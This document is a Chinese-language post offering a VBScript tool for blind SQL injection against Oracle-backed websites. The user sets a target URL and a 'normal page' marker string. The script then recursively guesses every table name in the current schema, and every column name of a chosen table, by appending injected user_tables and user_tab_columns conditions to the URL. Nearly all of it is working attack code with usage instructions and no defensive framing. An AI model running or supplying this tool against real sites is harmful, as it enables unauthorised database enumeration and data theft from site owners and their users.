vbs小铺

感谢marcos,人才呀,巧妙的递归;2010我懒了,以后再加猜字段值内容吧
Set oracleXML = CreateObject("Microsoft.XMLHTTP")
TargetURL = 自行修改
RightWord = "正常页面字符串" ’自行修改


if (lcase(right(wscript.fullname,11))="wscript.exe") then
wscript.echo "Execute it under the cmd.exe Plz! Thx."
wscript.quit
end If

   Set oArgs = WScript.arguments
   if oArgs.count<>0 then
   action=trim(oArgs(0))
      End if

select case action
case "biao"
   biaocrack
case "ziduan"
   Ziduancrack
case else
   usage
end Select

Function Biaocrack()
WScript.Echo GetTableNameX("")
End Function

Function Ziduancrack()
WScript.Echo GetFileNameX("")
End Function

Function usage()
WScript.Echo "请改动里的url和正确页面显示的字符串,默认猜字符型。如果数字型去掉sql语句里的第一个单引号"& vbNewLine
WScript.Echo "cscript this.vbs biao-------------------------------->是猜当前库所有的表名"&vbNewLine
WScript.Echo "cscript this.vbs 表名---------------------------->是猜给定表名里所有的字段名"&vbNewLine
End Function

Function GetTableNameX(sPrefix)

iLen = Len(sPrefix)
sPrefix = UCase(sPrefix)
aChars = Array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "_","-")

For I = 0 To UBound(aChars)
   If(iLen = 0)Then
    SQL = " and 0<>(select count(*) from user_tables where substr(table_name,1,1)"
   Else
    SQL = " and 0<>(select count(*) from user_tables where substr(table_name,1," & iLen & ")=" & sPrefix & " AND substr(table_name," & (iLen + 1) & ",1)"
   End If

   sSQL = SQL & "=" & aChars(I) & ") and a=a"
   sHTML = GetPage(TargetURL & sSQL)
   iPos = InStr(sHTML, RightWord)

   If(iPos > 0)Then
    sSQL=" and 0<>(select count(*) from user_tables where table_name=" & sPrefix & aChars(I) & ") and a=a"
    sHTML = GetPage(TargetURL & sSQL)
    iPos = InStr(sHTML, RightWord)

    If(iPos > 0)Then
     WScript.Echo "[-]: " & sPrefix & aChars(I)
     GetTableNameX = GetTableNameX & sPrefix & aChars(I) & vbNewLine
    End If

    sSQL=" and 0<>(select count(*) from user_tables where substr(table_name,1," & (iLen + 1) & ")=" & sPrefix & aChars(I) & " AND length(table_name)>" & (iLen + 1) & ") and a=a"
    sHTML = GetPage(TargetURL & sSQL)
    iPos = InStr(sHTML, RightWord)
    If(iPos > 0)Then
     WScript.Echo "[+]: " & sPrefix & aChars(I)
     GetTableNameX = GetTableNameX & vbNewLine & GetTableNameX(sPrefix & aChars(I))
    End If
   Else
    WScript.Echo sPrefix & aChars(I)
   End If

Next

WScript.Echo "=========================================="

End Function

Function GetFileNameX(sPrefix)

iLen = Len(sPrefix)
sPrefix = UCase(sPrefix)
aChars = Array("A", "B", "C", "D", "E", "F", "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X", "Y", "Z", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "_","-")

For I = 0 To UBound(aChars)
   If(iLen = 0)Then
    SQL = " and 0<>(select count(*) from user_tab_columns where table_name="&UCase(oArgs(1))&" and substr(column_name,1,1)"
   
   Else
    SQL = " and 0<>(select count(*) from user_tab_columns where table_name="&UCase(oArgs(1))&" and substr(column_name,1," & iLen & ")=" & sPrefix & " AND substr(column_name," & (iLen + 1) & ",1)"
   End If

   sSQL = SQL & "=" & aChars(I) & ") and a=a"
   WSH.ECHO TargetURL & sSQL
   sHTML = GetPage(TargetURL & sSQL)
   iPos = InStr(sHTML, RightWord)

   If(iPos > 0)Then
    sSQL=" and 0<>(select count(*) from user_tab_columns where table_name="&UCase(oArgs(1))&" and column_name=" & sPrefix & aChars(I) & ") and a=a"
    WSH.ECHO TargetURL & sSQL
    sHTML = GetPage(TargetURL & sSQL)
    iPos = InStr(sHTML, RightWord)

    If(iPos > 0)Then
     WScript.Echo "[-]: " & sPrefix & aChars(I)
     GetFileNameX = GetFileNameX & sPrefix & aChars(I) & vbNewLine
    End If

    sSQL=" and 0<>(select count(*) from user_tab_columns where table_name="&UCase(oArgs(1))&" and substr(column_name,1," & (iLen + 1) & ")=" & sPrefix & aChars(I) & " AND length(column_name)>" & (iLen + 1) & ") and a=a"
    WSH.ECHO TargetURL & sSQL
    sHTML = GetPage(TargetURL & sSQL)
    iPos = InStr(sHTML, RightWord)
    If(iPos > 0)Then
     WScript.Echo "[+]: " & sPrefix & aChars(I)
     GetFileNameX = GetFileNameX & vbNewLine & GetFileNameX(sPrefix & aChars(I))
    End If
   Else
    WScript.Echo sPrefix & aChars(I)
   End If

Next

WScript.Echo "=========================================="

End Function
===========================================================

Function GetPage(sURL)
oracleXML.Open "Get", sURL, False, "", ""
oracleXML.Send()
GetPage = BytesToBStr(oracleXML.ResponseBody)
End Function

============================================
函数名称:BytesToBStr
函数功能:将XMLHTTP对象中的内容转化为GB2312编码
============================================
Function BytesToBStr(Body)
Dim oStream

Set oStream = CreateObject("ADODB.Stream")
oStream.Type = 1
oStream.Mode =3
oStream.Open
oStream.Write Body
oStream.Position = 0
oStream.Type = 2
oStream.Charset = "GB2312"
BytesToBstr = oStream.ReadText
oStream.Close
Set oStream = nothing
End Function